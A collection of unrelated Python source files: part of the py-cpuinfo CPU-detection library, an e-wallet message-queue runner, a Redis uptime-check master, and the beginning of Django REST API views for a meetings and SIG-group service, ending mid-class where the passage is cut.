info['hz_actual_raw'] = to_raw_hz(new_hz, scale)
vendor_id = _get_field(False, output, None, None, 'Vendor ID')
if vendor_id:
info['vendor_id'] = vendor_id
brand = _get_field(False, output, None, None, 'Model name')
if brand:
info['brand'] = brand
family = _get_field(False, output, None, None, 'CPU family')
if family and family.isdigit():
info['family'] = int(family)
stepping = _get_field(False, output, None, None, 'Stepping')
if stepping and stepping.isdigit():
info['stepping'] = int(stepping)
model = _get_field(False, output, None, None, 'Model')
if model and model.isdigit():
info['model'] = int(model)
l1_data_cache_size = _get_field(False, output, None, None, 'L1d cache')
if l1_data_cache_size:
info['l1_data_cache_size'] = to_friendly_bytes(l1_data_cache_size)
l1_instruction_cache_size = _get_field(False, output, None, None, 'L1i cache')
if l1_instruction_cache_size:
info['l1_instruction_cache_size'] = to_friendly_bytes(l1_instruction_cache_size)
l2_cache_size = _get_field(False, output, None, None, 'L2 cache')
if l2_cache_size:
info['l2_cache_size'] = to_friendly_bytes(l2_cache_size)
l3_cache_size = _get_field(False, output, None, None, 'L3 cache')
if l3_cache_size:
info['l3_cache_size'] = to_friendly_bytes(l3_cache_size)
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
info['flags'] = flags
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_dmesg():
'''
Returns the CPU info gathered from dmesg.
Returns {} if dmesg is not found or does not have the desired info.
'''
# Just return {} if there is no dmesg
if not DataSource.has_dmesg():
return {}
# If dmesg fails return {}
returncode, output = DataSource.dmesg_a()
if output == None or returncode != 0:
return {}
return _parse_dmesg_output(output)
# https://openpowerfoundation.org/wp-content/uploads/2016/05/LoPAPR_DRAFT_v11_24March2016_cmt1.pdf
# page 767
def _get_cpu_info_from_ibm_pa_features():
'''
Returns the CPU info gathered from lsprop /proc/device-tree/cpus/*/ibm,pa-features
Returns {} if lsprop is not found or ibm,pa-features does not have the desired info.
'''
try:
# Just return {} if there is no lsprop
if not DataSource.has_ibm_pa_features():
return {}
# If ibm,pa-features fails return {}
returncode, output = DataSource.ibm_pa_features()
if output == None or returncode != 0:
return {}
# Filter out invalid characters from output
value = output.split("ibm,pa-features")[1].lower()
value = [s for s in value if s in list('0123456789abcfed')]
value = ''.join(value)
# Get data converted to Uint32 chunks
left = int(value[0 : 8], 16)
right = int(value[8 : 16], 16)
# Get the CPU flags
flags = {
# Byte 0
'mmu' : is_bit_set(left, 0),
'fpu' : is_bit_set(left, 1),
'slb' : is_bit_set(left, 2),
'run' : is_bit_set(left, 3),
#'reserved' : is_bit_set(left, 4),
'dabr' : is_bit_set(left, 5),
'ne' : is_bit_set(left, 6),
'wtr' : is_bit_set(left, 7),
# Byte 1
'mcr' : is_bit_set(left, 8),
'dsisr' : is_bit_set(left, 9),
'lp' : is_bit_set(left, 10),
'ri' : is_bit_set(left, 11),
'dabrx' : is_bit_set(left, 12),
'sprg3' : is_bit_set(left, 13),
'rislb' : is_bit_set(left, 14),
'pp' : is_bit_set(left, 15),
# Byte 2
'vpm' : is_bit_set(left, 16),
'dss_2.05' : is_bit_set(left, 17),
#'reserved' : is_bit_set(left, 18),
'dar' : is_bit_set(left, 19),
#'reserved' : is_bit_set(left, 20),
'ppr' : is_bit_set(left, 21),
'dss_2.02' : is_bit_set(left, 22),
'dss_2.06' : is_bit_set(left, 23),
# Byte 3
'lsd_in_dscr' : is_bit_set(left, 24),
'ugr_in_dscr' : is_bit_set(left, 25),
#'reserved' : is_bit_set(left, 26),
#'reserved' : is_bit_set(left, 27),
#'reserved' : is_bit_set(left, 28),
#'reserved' : is_bit_set(left, 29),
#'reserved' : is_bit_set(left, 30),
#'reserved' : is_bit_set(left, 31),
# Byte 4
'sso_2.06' : is_bit_set(right, 0),
#'reserved' : is_bit_set(right, 1),
#'reserved' : is_bit_set(right, 2),
#'reserved' : is_bit_set(right, 3),
#'reserved' : is_bit_set(right, 4),
#'reserved' : is_bit_set(right, 5),
#'reserved' : is_bit_set(right, 6),
#'reserved' : is_bit_set(right, 7),
# Byte 5
'le' : is_bit_set(right, 8),
'cfar' : is_bit_set(right, 9),
'eb' : is_bit_set(right, 10),
'lsq_2.07' : is_bit_set(right, 11),
#'reserved' : is_bit_set(right, 12),
#'reserved' : is_bit_set(right, 13),
#'reserved' : is_bit_set(right, 14),
#'reserved' : is_bit_set(right, 15),
# Byte 6
'dss_2.07' : is_bit_set(right, 16),
#'reserved' : is_bit_set(right, 17),
#'reserved' : is_bit_set(right, 18),
#'reserved' : is_bit_set(right, 19),
#'reserved' : is_bit_set(right, 20),
#'reserved' : is_bit_set(right, 21),
#'reserved' : is_bit_set(right, 22),
#'reserved' : is_bit_set(right, 23),
# Byte 7
#'reserved' : is_bit_set(right, 24),
#'reserved' : is_bit_set(right, 25),
#'reserved' : is_bit_set(right, 26),
#'reserved' : is_bit_set(right, 27),
#'reserved' : is_bit_set(right, 28),
#'reserved' : is_bit_set(right, 29),
#'reserved' : is_bit_set(right, 30),
#'reserved' : is_bit_set(right, 31),
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_cat_var_run_dmesg_boot():
'''
Returns the CPU info gathered from /var/run/dmesg.boot.
Returns {} if dmesg is not found or does not have the desired info.
'''
# Just return {} if there is no /var/run/dmesg.boot
if not DataSource.has_var_run_dmesg_boot():
return {}
# If dmesg.boot fails return {}
returncode, output = DataSource.cat_var_run_dmesg_boot()
if output == None or returncode != 0:
return {}
return _parse_dmesg_output(output)
def _get_cpu_info_from_sysctl():
'''
Returns the CPU info gathered from sysctl.
Returns {} if sysctl is not found.
'''
try:
# Just return {} if there is no sysctl
if not DataSource.has_sysctl():
return {}
# If sysctl fails return {}
returncode, output = DataSource.sysctl_machdep_cpu_hw_cpufrequency()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = _get_field(False, output, None, None, 'machdep.cpu.vendor')
processor_brand = _get_field(True, output, None, None, 'machdep.cpu.brand_string')
cache_size = _get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = _get_field(False, output, int, 0, 'machdep.cpu.stepping')
model = _get_field(False, output, int, 0, 'machdep.cpu.model')
family = _get_field(False, output, int, 0, 'machdep.cpu.family')
# Flags
flags = _get_field(False, output, None, '', 'machdep.cpu.features').lower().split()
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.leaf7_features').lower().split())
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.extfeatures').lower().split())
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = _get_field(False, output, None, None, 'hw.cpufrequency')
hz_actual = to_hz_string(hz_actual)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_sysinfo():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
info = _get_cpu_info_from_sysinfo_v1()
info.update(_get_cpu_info_from_sysinfo_v2())
return info
def _get_cpu_info_from_sysinfo_v1():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0]
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = int(output.split(', stepping ')[1].split(',')[0].strip())
model = int(output.split(', model ')[1].split(',')[0].strip())
family = int(output.split(', family ')[1].split(',')[0].strip())
# Flags
flags = []
for line in output.split('\n'):
if line.startswith('\t\t'):
for flag in line.strip().lower().split():
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, scale),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, scale),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_sysinfo_v2():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0]
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
signature = output.split('Signature:')[1].split('\n')[0].strip()
#
stepping = int(signature.split('stepping ')[1].split(',')[0].strip())
model = int(signature.split('model ')[1].split(',')[0].strip())
family = int(signature.split('family ')[1].split(',')[0].strip())
# Flags
def get_subsection_flags(output):
retval = []
for line in output.split('\n')[1:]:
if not line.startswith(' '): break
for entry in line.strip().lower().split(' '):
retval.append(entry)
return retval
flags = get_subsection_flags(output.split('Features: ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x00000001): ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x80000001): ')[1])
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, scale),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, scale),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_wmic():
'''
Returns the CPU info gathered from WMI.
Returns {} if not on Windows, or wmic is not installed.
'''
try:
# Just return {} if not Windows or there is no wmic
if not DataSource.is_windows or not DataSource.has_wmic():
return {}
returncode, output = DataSource.wmic_cpu()
if output == None or returncode != 0:
return {}
# Break the list into key values pairs
value = output.split("\n")
value = [s.rstrip().split('=') for s in value if '=' in s]
value = {k: v for k, v in value if v}
# Get the advertised MHz
processor_brand = value.get('Name')
scale_advertised, hz_advertised = _get_hz_string_from_brand(processor_brand)
# Get the actual MHz
hz_actual = value.get('CurrentClockSpeed')
scale_actual = 6
if hz_actual:
hz_actual = to_hz_string(hz_actual)
# Get cache sizes
l2_cache_size = value.get('L2CacheSize')
if l2_cache_size:
l2_cache_size = l2_cache_size + ' KB'
l3_cache_size = value.get('L3CacheSize')
if l3_cache_size:
l3_cache_size = l3_cache_size + ' KB'
# Get family, model, and stepping
family, model, stepping = '', '', ''
description = value.get('Description') or value.get('Caption')
entries = description.split(' ')
if 'Family' in entries and entries.index('Family') < len(entries)-1:
i = entries.index('Family')
family = int(entries[i + 1])
if 'Model' in entries and entries.index('Model') < len(entries)-1:
i = entries.index('Model')
model = int(entries[i + 1])
if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
i = entries.index('Stepping')
stepping = int(entries[i + 1])
info = {
'vendor_id' : value.get('Manufacturer'),
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale_advertised),
'hz_actual' : to_friendly_hz(hz_actual, scale_actual),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale_advertised),
'hz_actual_raw' : to_raw_hz(hz_actual, scale_actual),
'l2_cache_size' : l2_cache_size,
'l3_cache_size' : l3_cache_size,
'stepping' : stepping,
'model' : model,
'family' : family,
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_registry():
'''
FIXME: Is missing many of the newer CPU flags like sse3
Returns the CPU info gathered from the Windows Registry.
Returns {} if not on Windows.
'''
try:
# Just return {} if not on Windows
if not DataSource.is_windows:
return {}
# Get the CPU name
processor_brand = DataSource.winreg_processor_brand()
# Get the CPU vendor id
vendor_id = DataSource.winreg_vendor_id()
# Get the CPU arch and bits
raw_arch_string = DataSource.winreg_raw_arch_string()
arch, bits = parse_arch(raw_arch_string)
# Get the actual CPU Hz
hz_actual = DataSource.winreg_hz_actual()
hz_actual = to_hz_string(hz_actual)
# Get the advertised CPU Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
# Get the CPU features
feature_bits = DataSource.winreg_feature_bits()
def is_set(bit):
mask = 0x80000000 >> bit
retval = mask & feature_bits > 0
return retval
# http://en.wikipedia.org/wiki/CPUID
# http://unix.stackexchange.com/questions/43539/what-do-the-flags-in-proc-cpuinfo-mean
# http://www.lohninger.com/helpcsuite/public_constants_cpuid.htm
flags = {
'fpu' : is_set(0), # Floating Point Unit
'vme' : is_set(1), # V86 Mode Extensions
'de' : is_set(2), # Debug Extensions - I/O breakpoints supported
'pse' : is_set(3), # Page Size Extensions (4 MB pages supported)
'tsc' : is_set(4), # Time Stamp Counter and RDTSC instruction are available
'msr' : is_set(5), # Model Specific Registers
'pae' : is_set(6), # Physical Address Extensions (36 bit address, 2MB pages)
'mce' : is_set(7), # Machine Check Exception supported
'cx8' : is_set(8), # Compare Exchange Eight Byte instruction available
'apic' : is_set(9), # Local APIC present (multiprocessor operation support)
'sepamd' : is_set(10), # Fast system calls (AMD only)
'sep' : is_set(11), # Fast system calls
'mtrr' : is_set(12), # Memory Type Range Registers
'pge' : is_set(13), # Page Global Enable
'mca' : is_set(14), # Machine Check Architecture
'cmov' : is_set(15), # Conditional MOVe instructions
'pat' : is_set(16), # Page Attribute Table
'pse36' : is_set(17), # 36 bit Page Size Extensions
'serial' : is_set(18), # Processor Serial Number
'clflush' : is_set(19), # Cache Flush
#'reserved1' : is_set(20), # reserved
'dts' : is_set(21), # Debug Trace Store
'acpi' : is_set(22), # ACPI support
'mmx' : is_set(23), # MultiMedia Extensions
'fxsr' : is_set(24), # FXSAVE and FXRSTOR instructions
'sse' : is_set(25), # SSE instructions
'sse2' : is_set(26), # SSE2 (WNI) instructions
'ss' : is_set(27), # self snoop
#'reserved2' : is_set(28), # reserved
'tm' : is_set(29), # Automatic clock control
'ia64' : is_set(30), # IA64 instructions
'3dnow' : is_set(31) # 3DNow! instructions available
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 6),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 6),
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_kstat():
'''
Returns the CPU info gathered from isainfo and kstat.
Returns {} if isainfo or kstat are not found.
'''
try:
# Just return {} if there is no isainfo or kstat
if not DataSource.has_isainfo() or not DataSource.has_kstat():
return {}
# If isainfo fails return {}
returncode, flag_output = DataSource.isainfo_vb()
if flag_output == None or returncode != 0:
return {}
# If kstat fails return {}
returncode, kstat = DataSource.kstat_m_cpu_info()
if kstat == None or returncode != 0:
return {}
# Various fields
vendor_id = kstat.split('\tvendor_id ')[1].split('\n')[0].strip()
processor_brand = kstat.split('\tbrand ')[1].split('\n')[0].strip()
stepping = int(kstat.split('\tstepping ')[1].split('\n')[0].strip())
model = int(kstat.split('\tmodel ')[1].split('\n')[0].strip())
family = int(kstat.split('\tfamily ')[1].split('\n')[0].strip())
# Flags
flags = flag_output.strip().split('\n')[-1].strip().lower().split()
flags.sort()
# Convert from GHz/MHz string to Hz
scale = 6
hz_advertised = kstat.split('\tclock_MHz ')[1].split('\n')[0].strip()
hz_advertised = to_hz_string(hz_advertised)
# Convert from GHz/MHz string to Hz
hz_actual = kstat.split('\tcurrent_clock_Hz ')[1].split('\n')[0].strip()
hz_actual = to_hz_string(hz_actual)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def CopyNewFields(info, new_info):
keys = [
'vendor_id', 'hardware', 'brand', 'hz_advertised', 'hz_actual',
'hz_advertised_raw', 'hz_actual_raw', 'arch', 'bits', 'count',
'raw_arch_string', 'l2_cache_size', 'l2_cache_line_size',
'l2_cache_associativity', 'stepping', 'model', 'family',
'processor_type', 'extended_model', 'extended_family', 'flags',
'l3_cache_size', 'l1_data_cache_size', 'l1_instruction_cache_size'
]
for key in keys:
if new_info.get(key, None) and not info.get(key, None):
info[key] = new_info[key]
elif key == 'flags' and new_info.get('flags'):
for f in new_info['flags']:
if f not in info['flags']: info['flags'].append(f)
info['flags'].sort()
def get_cpu_info():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns {} if nothing is found.
'''
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
friendly_maxsize = { 2**31-1: '32 bit', 2**63-1: '64 bit' }.get(sys.maxsize) or 'unknown bits'
friendly_version = "{0}.{1}.{2}.{3}.{4}".format(*sys.version_info)
PYTHON_VERSION = "{0} ({1})".format(friendly_version, friendly_maxsize)
info = {
'python_version' : PYTHON_VERSION,
'cpuinfo_version' : CPUINFO_VERSION,
'arch' : arch,
'bits' : bits,
'count' : DataSource.cpu_count,
'raw_arch_string' : DataSource.raw_arch_string,
}
# Try the Windows wmic
CopyNewFields(info, _get_cpu_info_from_wmic())
# Try the Windows registry
CopyNewFields(info, _get_cpu_info_from_registry())
# Try /proc/cpuinfo
CopyNewFields(info, _get_cpu_info_from_proc_cpuinfo())
# Try cpufreq-info
CopyNewFields(info, _get_cpu_info_from_cpufreq_info())
# Try LSCPU
CopyNewFields(info, _get_cpu_info_from_lscpu())
# Try sysctl
CopyNewFields(info, _get_cpu_info_from_sysctl())
# Try kstat
CopyNewFields(info, _get_cpu_info_from_kstat())
# Try dmesg
CopyNewFields(info, _get_cpu_info_from_dmesg())
# Try /var/run/dmesg.boot
CopyNewFields(info, _get_cpu_info_from_cat_var_run_dmesg_boot())
# Try lsprop ibm,pa-features
CopyNewFields(info, _get_cpu_info_from_ibm_pa_features())
# Try sysinfo
CopyNewFields(info, _get_cpu_info_from_sysinfo())
# Try querying the CPU cpuid register
CopyNewFields(info, _get_cpu_info_from_cpuid())
return info
# Make sure we are running on a supported system
def _check_arch():
arch, bits = parse_arch(DataSource.raw_arch_string)
if not arch in ['X86_32', 'X86_64', 'ARM_7', 'ARM_8', 'PPC_64', 'S390X']:
raise Exception("py-cpuinfo currently only works on X86 and some PPC, S390X and ARM CPUs.")
def main():
try:
_check_arch()
except Exception as err:
sys.stderr.write(str(err) + "\n")
sys.exit(1)
info = get_cpu_info()
if info:
print('python version: {0}'.format(info.get('python_version', '')))
print('cpuinfo version: {0}'.format(info.get('cpuinfo_version', '')))
print('Vendor ID: {0}'.format(info.get('vendor_id', '')))
print('Hardware Raw: {0}'.format(info.get('hardware', '')))
print('Brand: {0}'.format(info.get('brand', '')))
print('Hz Advertised: {0}'.format(info.get('hz_advertised', '')))
print('Hz Actual: {0}'.format(info.get('hz_actual', '')))
print('Hz Advertised Raw: {0}'.format(info.get('hz_advertised_raw', '')))
print('Hz Actual Raw: {0}'.format(info.get('hz_actual_raw', '')))
print('Arch: {0}'.format(info.get('arch', '')))
print('Bits: {0}'.format(info.get('bits', '')))
print('Count: {0}'.format(info.get('count', '')))
print('Raw Arch String: {0}'.format(info.get('raw_arch_string', '')))
print('L1 Data Cache Size: {0}'.format(info.get('l1_data_cache_size', '')))
print('L1 Instruction Cache Size: {0}'.format(info.get('l1_instruction_cache_size', '')))
print('L2 Cache Size: {0}'.format(info.get('l2_cache_size', '')))
print('L2 Cache Line Size: {0}'.format(info.get('l2_cache_line_size', '')))
print('L2 Cache Associativity: {0}'.format(info.get('l2_cache_associativity', '')))
print('L3 Cache Size: {0}'.format(info.get('l3_cache_size', '')))
print('Stepping: {0}'.format(info.get('stepping', '')))
print('Model: {0}'.format(info.get('model', '')))
print('Family: {0}'.format(info.get('family', '')))
print('Processor Type: {0}'.format(info.get('processor_type', '')))
print('Extended Model: {0}'.format(info.get('extended_model', '')))
print('Extended Family: {0}'.format(info.get('extended_family', '')))
print('Flags: {0}'.format(', '.join(info.get('flags', ''))))
else:
sys.stderr.write("Failed to find cpu info\n")
sys.exit(1)
if __name__ == '__main__':
from multiprocessing import freeze_support
freeze_support()
main()
else:
_check_arch()
|
runner.py
|
import threading
from publisher import EWalletPublisher
from consumer import EWalletConsumer
class EWalletRunner():
def __init__(self):
self.publisher = EWalletPublisher('172.17.0.3', '1306398983')
self.consumer = EWalletConsumer('172.17.0.3', '1306398983', self.publisher)
publish_ping_thread = threading.Thread(target=self.publisher.publish_ping)
publish_ping_thread.start()
consume_ping_thread = threading.Thread(target=self.consumer.consume_ping)
consume_ping_thread.start()
# === REGISTER
consume_register_request_thread = threading.Thread(
target=self.consumer.consume_register_request
)
consume_register_request_thread.start()
# === GET SALDO
consume_saldo_request_thread = threading.Thread(
target=self.consumer.consume_saldo_request
)
consume_saldo_request_thread.start()
# === TRANSFER
consume_transfer_request_thread = threading.Thread(
target=self.consumer.consume_transfer_request
)
consume_transfer_request_thread.start()
# === GET TOTAL SALDO
consume_total_saldo_request_thread = threading.Thread(
target=self.consumer.consume_total_saldo_request
)
consume_total_saldo_request_thread.start()
def do_register(self, user_id, nama, receiver_id):
consumer = threading.Thread(
target=self.consumer.consume_register_response
)
consumer.start()
self.publisher.publish_register_request(user_id, nama, receiver_id)
def do_get_saldo(self, user_id, receiver_id):
consumer = threading.Thread(
target=self.consumer.consume_saldo_response
)
consumer.start()
self.publisher.publish_saldo_request(user_id, receiver_id)
def do_transfer(self, user_id, nilai, receiver_id):
self.consumer.transfer_user_id = user_id
self.consumer.transfer_nilai = nilai
consumer = threading.Thread(
target=self.consumer.consume_transfer_response
)
consumer.start()
self.publisher.publish_transfer_request(user_id, nilai, receiver_id)
def do_get_total_saldo(self, user_id, receiver_id):
consumer = threading.Thread(
target=self.consumer.consume_total_saldo_response
)
consumer.start()
self.publisher.publish_total_saldo_request(user_id, receiver_id)
runner = EWalletRunner()
|
pingermaster.py
|
#!/usr/bin/env python
import redis
import yaml
import json
import time
import threading
from handlers import Handler
class Config:
def __init__(self):
with open('./checks.yaml') as f:
self.config = yaml.load(f)
class Master:
def __init__(self):
self.handlers = Handler.plugins
self.config = Config().config
self.checks = self.config['checks']
self.redis = redis.StrictRedis(host='localhost', port=6379, db=0)
self.pubsub = self.redis.pubsub()
self.pubsub.subscribe(['results'])
self.log = logging.getLogger(self.__class__.__name__)
for check in self.checks.keys():
self.redis.set(self.key(check, 'time'), 0)
self.redis.set(self.key(check, 'failures'), 0)
self.redis.delete(self.key(check, 'down'))
def publish_check(self, url, params):
last_check = int(self.redis.get(self.key(url, 'time')))
now_time = int(time.time())
if last_check + params['interval'] <= now_time:
self.redis.set(self.key(url, 'time'), int(time.time()))
self.log.info("publishing check {0}".format(url))
self.redis.rpush('checks',
json.dumps({'url': url, 'params': params}))
def handle_result(self, url, params, result, message, details):
down = self.redis.get(self.key(url, 'down'))
handler_config = self.config['handlers'][params['handler']]
handler = self.handlers[handler_config['plugin']](**handler_config)
if result == 'DOWN':
num_failures = int(self.redis.get(self.key(url, 'failures')))
if num_failures >= params['failed_checks'] and not down:
message = "{0} DOWN {1}".format(url, message)
handler.down_alert(url, message, details)
self.redis.set(self.key(url, 'down'), True)
num_failures += 1
self.redis.set(self.key(url, 'failures'), num_failures)
if result == 'UP' and down:
message = "{0} UP".format(url)
handler.up_alert(url, message)
self.redis.delete(self.key(url, 'down'))
self.redis.set(self.key(url, 'failures'), 0)
def key(self, *args):
return "_".join(args)
def run(self):
for item in self.pubsub.listen():
print item['data']
if item['data'] != 1:
item = json.loads(item['data'])
self.handle_result(**item)
if __name__ == "__main__":
import logging
logging.basicConfig(level=logging.INFO)
pp = Master()
handler = threading.Thread(target=pp.run)
handler.daemon = True
handler.start()
while True:
for check, params in pp.checks.items():
pp.publish_check(check, params)
time.sleep(1)
|
views.py
|
import datetime
import json
import math
import random
import re
import requests
import logging
import time
import sys
from django.conf import settings
from django.db.models import Q
from django.http import JsonResponse
from drf_yasg.utils import swagger_auto_schema
from rest_framework.filters import SearchFilter
from rest_framework.generics import GenericAPIView
from rest_framework.mixins import ListModelMixin, CreateModelMixin, RetrieveModelMixin, DestroyModelMixin, \
UpdateModelMixin
from rest_framework_simplejwt import authentication
from meetings.models import User, Group, Meeting, GroupUser, Collect, Video, Record, Activity, ActivityCollect, \
ActivityRegister, Feedback, ActivitySign
from meetings.permissions import MaintainerPermission, AdminPermission, ActivityAdminPermission, SponsorPermission, \
QueryPermission
from meetings.serializers import LoginSerializer, GroupsSerializer, MeetingSerializer, UsersSerializer, \
UserSerializer, GroupUserAddSerializer, GroupSerializer, UsersInGroupSerializer, UserGroupSerializer, \
MeetingListSerializer, GroupUserDelSerializer, UserInfoSerializer, SigsSerializer, MeetingsDataSerializer, \
AllMeetingsSerializer, CollectSerializer, SponsorSerializer, SponsorInfoSerializer, ActivitySerializer, \
ActivitiesSerializer, ActivityDraftUpdateSerializer, ActivityUpdateSerializer, ActivityCollectSerializer, \
ActivityRegisterSerializer, ApplicantInfoSerializer, FeedbackSerializer, ActivityRetrieveSerializer, \
ActivitySignSerializer, ActivityRegistrantsSerializer
from rest_framework.response import Response
from multiprocessing import Process
from meetings.send_email import sendmail
from rest_framework import permissions
from meetings.utils import gene_wx_code, send_applicants_info, send_feedback, invite, send_start_url, gene_sign_code
logger = logging.getLogger('log')
offline = 1
online = 2
class LoginView(GenericAPIView, CreateModelMixin, ListModelMixin):
"""用户注册与授权登陆"""
serializer_class = LoginSerializer
queryset = User.objects.all()
@swagger_auto_schema(operation_summary='用户注册与授权登陆')
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
def perform_create(self, serializer):
serializer.save()
class GroupsView(GenericAPIView, ListModelMixin):
"""查询所有SIG组的名称"""
serializer_class = GroupsSerializer
queryset = Group.objects.all().order_by('group_name')
filter_backends = [SearchFilter]
search_fields = ['group_name']
@swagger_auto_schema(operation_summary='查询所有SIG组')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class SigsView(GenericAPIView, ListModelMixin):
"""查询所有SIG组的名称、首页、邮件列表、IRC频道及成员的nickname、gitee_name、avatar"""
serializer_class = SigsSerializer
queryset = Group.objects.all()
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class GroupView(GenericAPIView, RetrieveModelMixin):
"""查询单个SIG组"""
serializer_class = GroupSerializer
queryset = Group.objects.all()
@swagger_auto_schema(operation_summary='查询单个SIG组')
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
class UsersIncludeView(GenericAPIView, ListModelMixin):
"""查询所选SIG组的所有成员"""
serializer_class = UsersInGroupSerializer
queryset = User.objects.all()
filter_backends = [SearchFilter]
search_fields = ['nickname']
@swagger_auto_schema(operation_summary='查询所选SIG组的所有成员')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
try:
groupusers = GroupUser.objects.filter(group_id=self.kwargs['pk']).all()
ids = [x.user_id for x in groupusers]
user = User.objects.filter(id__in=ids)
return user
except KeyError:
pass
class UsersExcludeView(GenericAPIView, ListModelMixin):
"""查询不在该组的所有成员"""
serializer_class = UsersSerializer
queryset = User.objects.all().order_by('nickname')
filter_backends = [SearchFilter]
search_fields = ['nickname']
@swagger_auto_schema(operation_summary='查询不在该组的所有用户')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
try:
groupusers = GroupUser.objects.filter(group_id=self.kwargs['pk']).all()
ids = [x.user_id for x in groupusers]
user = User.objects.filter().exclude(id__in=ids)
return user
except KeyError:
pass
class UserGroupView(GenericAPIView, ListModelMixin):
"""查询该用户的SIG组以及该组的etherpad"""
serializer_class = UserGroupSerializer
queryset = GroupUser.objects.all()
@swagger_auto_schema(operation_summary='查询该用户的SIG组以及该组的etherpad')
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def get_queryset(self):
try:
usergroup = GroupUser.objects.filter(user_id=self.kwargs['pk']).all()
return usergroup
except KeyError:
pass
class UserView(GenericAPIView, UpdateModelMixin):
"""更新用户gitee_name"""
serializer_class = UserSerializer
queryset = User.objects.all()
authentication_classes = (authentication.JWTAuthentication,)
permission_classes = (AdminPermission,)
@swagger_auto_schema(operation_summary='更新用户gitee_name')
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
class GroupUserAddView(GenericAPIView, CreateModelMixin):
